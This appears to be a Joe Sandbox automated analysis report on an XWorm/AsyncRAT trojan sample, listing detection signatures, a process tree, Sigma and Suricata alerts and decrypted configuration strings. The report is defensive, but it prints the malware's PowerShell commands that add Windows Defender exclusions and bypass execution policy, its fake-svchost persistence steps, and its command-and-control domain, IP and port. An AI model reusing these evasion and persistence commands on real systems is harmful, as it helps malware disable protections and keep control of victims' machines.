Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
Analysis ID:1536954
MD5:418f363765e0400ffa7e1fe93866ddeb
SHA1:9c40b8b8308e7a87f781f02f6b1add7c646317d3
SHA256:72e80f29189f332c8fcb9c88a24e62b28a35bb4ce8e63a2f19c6ac3618f79d58
Tags:AsyncRATexe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe (PID: 1436 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe" MD5: 418F363765E0400FFA7E1FE93866DDEB)
    • powershell.exe (PID: 2748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 7648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 2424 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7752 cmdline: "C:\Users\user\AppData\Local\svchost.exe" MD5: 418F363765E0400FFA7E1FE93866DDEB)
  • svchost.exe (PID: 7816 cmdline: "C:\Users\user\AppData\Local\svchost.exe" MD5: 418F363765E0400FFA7E1FE93866DDEB)
  • svchost.exe (PID: 7384 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7632 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1436 -ip 1436 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.2656202645.000000000391C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000014.00000002.2656202645.000000000391C000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7c60:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x1aa9c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x22ab4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7cfd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x1ab39:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x22b51:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7e12:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x1ac4e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x22c66:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7ad2:$cnc4: POST / HTTP/1.1
    • 0x1a90e:$cnc4: POST / HTTP/1.1
    • 0x22926:$cnc4: POST / HTTP/1.1
    00000014.00000002.2656202645.0000000003947000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000014.00000002.2656202645.0000000003947000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7acc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xd918:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7b69:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xd9c0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x7c7e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xdae0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x793e:$cnc4: POST / HTTP/1.1
      00000014.00000002.2655969773.00000000019F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 5 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        20.2.svchost.exe.19f0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          20.2.svchost.exe.19f0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x5b1c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x5bb9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x5cce:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x598e:$cnc4: POST / HTTP/1.1
          20.2.svchost.exe.19f0000.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            20.2.svchost.exe.19f0000.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              20.2.svchost.exe.19f0000.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x791c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x79b9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x7ace:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x778e:$cnc4: POST / HTTP/1.1
              Click to see the 10 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Files With System Process Name In Unsuspected Locations
              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ProcessId: 1436, TargetFilename: C:\Users\user\AppData\Local\svchost.exe
              Sigma detected: Potentially Suspicious Malware Callback Communication
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 194.5.152.215, DestinationIsIpv6: false, DestinationPort: 4443, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, Initiated: true, ProcessId: 1436, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 60591
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ParentProcessId: 1436, ParentProcessName: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', ProcessId: 2748, ProcessName: powershell.exe
              Sigma detected: System File Execution Location Anomaly
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\AppData\Local\svchost.exe" , ProcessId: 7752, ProcessName: svchost.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ParentProcessId: 1436, ParentProcessName: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', ProcessId: 2748, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ProcessId: 1436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ParentProcessId: 1436, ParentProcessName: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', ProcessId: 2748, ProcessName: powershell.exe
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ProcessId: 1436, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ParentProcessId: 1436, ParentProcessName: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe', ProcessId: 2748, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\AppData\Local\svchost.exe" , ProcessId: 7752, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-18T12:41:50.286751+020028033053Unknown Traffic192.168.2.660606104.26.3.16443TCP
              2024-10-18T12:41:56.779940+020028033053Unknown Traffic192.168.2.660609104.26.3.16443TCP
              2024-10-18T12:42:03.212851+020028033053Unknown Traffic192.168.2.660615104.26.3.16443TCP
              2024-10-18T12:42:06.139633+020028033053Unknown Traffic192.168.2.660616104.26.3.16443TCP
              2024-10-18T12:42:09.095164+020028033053Unknown Traffic192.168.2.660619104.26.3.16443TCP
              2024-10-18T12:42:12.046276+020028033053Unknown Traffic192.168.2.660621104.26.3.16443TCP
              2024-10-18T12:42:17.972385+020028033053Unknown Traffic192.168.2.660626104.26.3.16443TCP
              2024-10-18T12:42:27.686341+020028033053Unknown Traffic192.168.2.660633104.26.3.16443TCP
              2024-10-18T12:42:43.684025+020028033053Unknown Traffic192.168.2.660650104.26.3.16443TCP
              2024-10-18T12:42:53.229372+020028033053Unknown Traffic192.168.2.660658104.26.3.16443TCP
              2024-10-18T12:43:07.296793+020028033053Unknown Traffic192.168.2.660671104.26.3.16443TCP
              2024-10-18T12:43:19.374937+020028033053Unknown Traffic192.168.2.660681104.26.3.16443TCP
              2024-10-18T12:43:22.687328+020028033053Unknown Traffic192.168.2.660684104.26.3.16443TCP
              2024-10-18T12:43:36.066149+020028033053Unknown Traffic192.168.2.660695104.26.3.16443TCP
              2024-10-18T12:43:39.695261+020028033053Unknown Traffic192.168.2.660699104.26.3.16443TCP
              2024-10-18T12:43:49.543669+020028033053Unknown Traffic192.168.2.660711104.26.3.16443TCP
              2024-10-18T12:43:51.958734+020028033053Unknown Traffic192.168.2.660713104.26.3.16443TCP
              2024-10-18T12:43:53.042994+020028033053Unknown Traffic192.168.2.660714104.26.3.16443TCP
              2024-10-18T12:43:54.109771+020028033053Unknown Traffic192.168.2.660716104.26.3.16443TCP
              2024-10-18T12:43:56.182511+020028033053Unknown Traffic192.168.2.660718104.26.3.16443TCP
              2024-10-18T12:44:00.162341+020028033053Unknown Traffic192.168.2.660722104.26.3.16443TCP
              2024-10-18T12:44:03.818485+020028033053Unknown Traffic192.168.2.660725104.26.3.16443TCP
              2024-10-18T12:44:09.499486+020028033053Unknown Traffic192.168.2.660732104.26.3.16443TCP
              2024-10-18T12:44:10.492146+020028033053Unknown Traffic192.168.2.660734104.26.3.16443TCP
              2024-10-18T12:44:13.395937+020028033053Unknown Traffic192.168.2.660736104.26.3.16443TCP
              2024-10-18T12:44:16.018502+020028033053Unknown Traffic192.168.2.660738104.26.3.16443TCP
              2024-10-18T12:44:26.087610+020028033053Unknown Traffic192.168.2.660751104.26.3.16443TCP
              2024-10-18T12:44:27.071776+020028033053Unknown Traffic192.168.2.660752104.26.3.16443TCP
              2024-10-18T12:44:30.359936+020028033053Unknown Traffic192.168.2.660755104.26.3.16443TCP
              2024-10-18T12:44:35.823104+020028033053Unknown Traffic192.168.2.660760104.26.3.16443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-18T12:43:57.846838+020028531931Malware Command and Control Activity Detected192.168.2.660721194.5.152.2154443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\svchost.exeAvira: detection malicious, Label: TR/AD.Nekark.lxbih
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\svchost.exeReversingLabs: Detection: 50%
              Multi AV Scanner detection for submitted file
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeReversingLabs: Detection: 50%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\svchost.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 20.2.svchost.exe.391c344.1.raw.unpackString decryptor: xworm1337.ddnsgratis.com.br
              Source: 20.2.svchost.exe.391c344.1.raw.unpackString decryptor: 4443
              Source: 20.2.svchost.exe.391c344.1.raw.unpackString decryptor: <123456789>
              Source: 20.2.svchost.exe.391c344.1.raw.unpackString decryptor: <Xwormmm>
              Source: 20.2.svchost.exe.391c344.1.raw.unpackString decryptor: XWorm V5.4
              Source: 20.2.svchost.exe.391c344.1.raw.unpackString decryptor: USB.exe
              Source: 20.2.svchost.exe.391c344.1.raw.unpackString decryptor: %LocalAppData%
              Source: 20.2.svchost.exe.391c344.1.raw.unpackString decryptor: svchost.exe
              Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.6:60605 version: TLS 1.2
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: System.pdb0G source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Xml.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.ni.pdbRSDS source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: ConsoleApp8.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: ConsoleApp8.pdb` source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Configuration.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Xml.pdbSystem.Core.dll source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Configuration.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Xml.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Core.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Numerics.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, WER1E43.tmp.dmp.26.dr
              Source: Binary string: Microsoft.VisualBasic.pdbH$jS source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Management.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: mscorlib.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Management.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Core.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: C:\Users\clien\Desktop\projeto6\ConsoleApp8\obj\Debug\ConsoleApp8.pdb. source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.dr
              Source: Binary string: HPbn0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4331475165.000000000604B000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5 source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4327200255.0000000005BC6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Numerics.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: C:\Users\clien\Desktop\projeto6\ConsoleApp8\obj\Debug\ConsoleApp8.pdb source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Numerics.pdb" source: WER1E43.tmp.dmp.26.dr

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:60657 -> 194.5.152.215:4443
              Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:60721 -> 194.5.152.215:4443
              Connects to a pastebin service (likely for C&C)
              Source: unknownDNS query: name: rentry.co
              Source: unknownDNS query: name: rentry.co
              Yara detected Generic Downloader
              Source: Yara matchFile source: 20.2.svchost.exe.19f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.39471b0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.391c344.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000014.00000002.2655969773.00000000019F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: global trafficTCP traffic: 192.168.2.6:60591 -> 194.5.152.215:4443
